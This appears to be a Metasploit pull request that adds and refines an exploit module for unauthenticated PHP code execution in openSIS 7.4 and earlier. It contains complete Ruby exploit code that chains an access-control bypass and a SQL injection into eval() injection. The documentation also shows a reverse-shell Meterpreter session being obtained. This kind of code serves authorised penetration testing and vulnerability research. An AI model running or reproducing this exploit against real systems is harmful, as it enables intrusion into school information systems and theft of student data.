### PR TITLE
Add openSIS Unauthenticated PHP Code Execution

### DIFF
--- a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
+++ b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
@@ -8,6 +8,8 @@ This module exploits multiple vulnerabilities in [openSIS](https://www.opensis.c
 
 The module has been successfully tested against [openSIS](https://www.opensis.com/) versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
 
+Download link: https://sourceforge.net/projects/opensis-ce/files/
+
 ## Verification Steps
 
   1. Install the web application

--- a/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
+++ b/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities in [openSIS](https://www.opensis.com/) 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. It is based on these advisories:
+
+- http://karmainsecurity.com/KIS-2020-06
+- http://karmainsecurity.com/KIS-2020-07
+- http://karmainsecurity.com/KIS-2020-08
+
+The module has been successfully tested against [openSIS](https://www.opensis.com/) versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
+
+## Verification Steps
+
+  1. Install the web application
+  2. Start msfconsole
+  3. Do: ```use unix/webapp/opensis_chain_exec```
+  4. Do: ```set RHOSTS [IP]```
+  5. Do: ```set TARGETURI [/path/to/opensis]```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+The base path to the web application (e.g. `/opensis/`). The default value is `/`.
+
+## Scenarios
+
+**openSIS 7.4 running on Ubuntu 18.04.4**
+
+```
+msf5 > use unix/webapp/opensis_chain_exec
+msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost
+msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/
+msf5 exploit(unix/webapp/opensis_chain_exec) > check 
+
+[*] Retrieving session cookie
+[*] Injecting malicious SQL into session variable
+[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
+[*] Executing PHP code by calling Bottom.php
+[+] 127.0.0.1:80 - The target is vulnerable.
+
+msf5 exploit(unix/webapp/opensis_chain_exec) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Retrieving session cookie
+[*] Injecting malicious SQL into session variable
+[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
+[*] Executing PHP code by calling Bottom.php
+[*] Sending stage (38288 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:45460) at 2020-07-01 23:31:43 +0200
+
+meterpreter > getuid 
+Server username: www-data (33)
+meterpreter > 
+```

--- a/modules/exploits/unix/webapp/opensis_chain_exec.rb
+++ b/modules/exploits/unix/webapp/opensis_chain_exec.rb
@@ -62,6 +62,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NoAccess, 'Failed to retrieve session cookie')
     end
 
+    random_title = rand_text_alpha(10)
     random_param = rand_text_alpha(10)
     php_cod = "];eval(base64_decode($_POST[#{random_param}]));die;//\\"
     sql_enc = php_cod.each_byte.map{ |b| b.to_s(16) }.join
@@ -69,16 +70,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Injecting malicious SQL into session variable')
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri.path, 'CpSessionSet.php/index.php'),
       'cookie'    => session,
-      'vars_post' => {'title' => '1', 'course_id' => sql_inj}
+      'vars_post' => {'title' => random_title, 'course_id' => sql_inj}
     })
+
+    unless res && res.code == 200 && res.body =~ /#{random_title}/
+      fail_with(Failure::NoAccess, 'Failed to call CpSessionSet.php')
+    end
 
     print_status("Calling ForExport.php to set $_SESSION['_REQUEST_vars']")
 
-    send_request_cgi({
+    res = send_request_cgi({
       'method'    => 'POST',
       'uri'       => normalize_uri(target_uri.path, 'ForExport.php/index.php'),
       'cookie'    => session,
@@ -90,6 +95,10 @@ class MetasploitModule < Msf::Exploit::Remote
             'year_start'  => rand_text_numeric(4, bad='0')
       }
     })
+
+    unless res && res.code == 200 && res.body =~ /Error in User/
+      fail_with(Failure::NoAccess, 'Failed to call ForExport.php')
+    end
 
     print_status('Executing PHP code by calling Bottom.php')
 

--- a/modules/exploits/unix/webapp/opensis_chain_exec.rb
+++ b/modules/exploits/unix/webapp/opensis_chain_exec.rb
@@ -45,24 +45,29 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exec_php(php_code)
-    print_status("Retrieving session cookies")
+    print_status('Retrieving session cookie')
 
     res = send_request_cgi({
       'method'    => 'GET',
       'uri'       => normalize_uri(target_uri.path)
     })
 
-    unless res && res.code == 200 && res.body && res.get_cookies
-      fail_with(Failure::NoAccess, "Failed to retrieve session cookies")
+    unless res
+      fail_with(Failure::Unreachable, 'Connection failed')
     end
 
     session = res.get_cookies
+
+    unless res.code == 200 && res.body && session =~ /PHPSESSID=([A-Za-z0-9]*);/
+      fail_with(Failure::NoAccess, 'Failed to retrieve session cookie')
+    end
+
     random_param = rand_text_alpha(10)
     php_cod = "];eval(base64_decode($_POST[#{random_param}]));die;//\\"
     sql_enc = php_cod.each_byte.map{ |b| b.to_s(16) }.join
     sql_inj = "' UNION SELECT 0x#{sql_enc}#"
 
-    print_status("Injecting malicious SQL into session variable")
+    print_status('Injecting malicious SQL into session variable')
 
     send_request_cgi({
       'method'    => 'POST',
@@ -71,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {'title' => '1', 'course_id' => sql_inj}
     })
 
-    print_status("Calling ForExport.php to set $_SESSION['_REQUEST_vars']")
+    print_status('Calling ForExport.php to set $_SESSION[\'_REQUEST_vars\']')
 
     send_request_cgi({
       'method'    => 'POST',
@@ -80,13 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {
             'modname'     => 'scheduling/MassSchedule.php',
             'modfunc'     => 'save',
-            'day_start'   => '1',
-            'month_start' => '1',
-            'year_start'  => '1984'
+            'day_start'   => rand_text_numeric(1, bad='0'),
+            'month_start' => rand_text_numeric(1, bad='0'),
+            'year_start'  => rand_text_numeric(4, bad='0')
       }
     })
 
-    print_status("Executing PHP code by calling Bottom.php")
+    print_status('Executing PHP code by calling Bottom.php')
 
     res = send_request_cgi({
       'method'    => 'POST',
@@ -100,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    flag = rand_text_alpha(rand(10)+20)
+    flag = rand_text_alpha(20..30)
     res  = exec_php("print '#{flag}';")
 
     if res && res.code == 200 && res.body =~ /#{flag}/

--- a/modules/exploits/unix/webapp/opensis_chain_exec.rb
+++ b/modules/exploits/unix/webapp/opensis_chain_exec.rb
@@ -1,0 +1,116 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'openSIS Unauthenticated PHP Code Execution',
+      'Description'    => %q{
+        This module exploits multiple vulnerabilities in openSIS 7.4 and prior versions
+        which could be abused by unauthenticated attackers to execute arbitrary PHP code
+        with the permissions of the webserver. The exploit chain abuses an incorrect access
+        control issue which allows access to scripts which should require the user to be
+        authenticated, and a Local File Inclusion to reach a SQL injection vulnerability which
+        results in execution of arbitrary PHP code due to an unsafe use of the eval() function.
+      },
+      'Author'         => 'EgiX',
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://karmainsecurity.com/KIS-2020-06'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-07'],
+          ['URL', 'http://karmainsecurity.com/KIS-2020-08'],
+          ['CVE', '2020-13381'],
+          ['CVE', '2020-13382'],
+          ['CVE', '2020-13383']
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [ ['openSIS <= 7.4', {}] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jun 30 2020'
+      ))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, "The base path to the web application", "/"])
+        ])
+  end
+
+  def exec_php(php_code)
+    print_status("Retrieving session cookies")
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path)
+    })
+
+    unless res && res.code == 200 && res.body && res.get_cookies
+      fail_with(Failure::NoAccess, "Failed to retrieve session cookies")
+    end
+
+    session = res.get_cookies
+    random_param = rand_text_alpha(10)
+    php_cod = "];eval(base64_decode($_POST[#{random_param}]));die;//\\"
+    sql_enc = php_cod.each_byte.map{ |b| b.to_s(16) }.join
+    sql_inj = "' UNION SELECT 0x#{sql_enc}#"
+
+    print_status("Injecting malicious SQL into session variable")
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'CpSessionSet.php/index.php'),
+      'cookie'    => session,
+      'vars_post' => {'title' => '1', 'course_id' => sql_inj}
+    })
+
+    print_status("Calling ForExport.php to set $_SESSION['_REQUEST_vars']")
+
+    send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'ForExport.php/index.php'),
+      'cookie'    => session,
+      'vars_post' => {
+            'modname'     => 'scheduling/MassSchedule.php',
+            'modfunc'     => 'save',
+            'day_start'   => '1',
+            'month_start' => '1',
+            'year_start'  => '1984'
+      }
+    })
+
+    print_status("Executing PHP code by calling Bottom.php")
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'Bottom.php/index.php'),
+      'cookie'    => session,
+      'vars_get'  => {'modname' => 'scheduling/MassSchedule.php', 'modfunc' => 'print'},
+      'vars_post' => {random_param => Rex::Text.encode_base64(php_code)}
+    }, 1)
+
+    res
+  end
+
+  def check
+    flag = rand_text_alpha(rand(10)+20)
+    res  = exec_php("print '#{flag}';")
+
+    if res && res.code == 200 && res.body =~ /#{flag}/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    exec_php(payload.encoded)
+  end
+end

--- a/modules/exploits/unix/webapp/opensis_chain_exec.rb
+++ b/modules/exploits/unix/webapp/opensis_chain_exec.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => {'title' => '1', 'course_id' => sql_inj}
     })
 
-    print_status('Calling ForExport.php to set $_SESSION[\'_REQUEST_vars\']')
+    print_status("Calling ForExport.php to set $_SESSION['_REQUEST_vars']")
 
     send_request_cgi({
       'method'    => 'POST',


### PR DESCRIPTION
This PR is for a module that exploit multiple vulnerabilities in openSIS 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. The module is based on these advisories:

http://karmainsecurity.com/KIS-2020-06
http://karmainsecurity.com/KIS-2020-07
http://karmainsecurity.com/KIS-2020-08

## Vulnerable Application

The module has been successfully tested against [openSIS](https://www.opensis.com/) versions 7.3 and 7.4 running on Ubuntu.
Older versions might be affected as well.

## Verification Steps

  1. Install the web application
  2. Start msfconsole
  3. Do: ```use unix/webapp/opensis_chain_exec```
  4. Do: ```set RHOSTS [IP]```
  5. Do: ```set TARGETURI [/path/to/opensis]```
  6. Do: ```run```
  7. You should get a shell.

## Options

### TARGETURI

The base path to the web application (e.g. `/opensis/`). The default value is `/`.

## Scenarios

**openSIS 7.4 running on Ubuntu 18.04.4**

```
msf5 > use unix/webapp/opensis_chain_exec
msf5 exploit(unix/webapp/opensis_chain_exec) > set RHOSTS localhost
msf5 exploit(unix/webapp/opensis_chain_exec) > set TARGETURI /opensis/
msf5 exploit(unix/webapp/opensis_chain_exec) > check 

[*] Retrieving session cookie
[*] Injecting malicious SQL into session variable
[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
[*] Executing PHP code by calling Bottom.php
[+] 127.0.0.1:80 - The target is vulnerable.

msf5 exploit(unix/webapp/opensis_chain_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Retrieving session cookie
[*] Injecting malicious SQL into session variable
[*] Calling ForExport.php to set $_SESSION['_REQUEST_vars']
[*] Executing PHP code by calling Bottom.php
[*] Sending stage (38288 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:45460) at 2020-07-01 23:31:43 +0200

meterpreter > getuid 
Server username: www-data (33)
meterpreter > 
```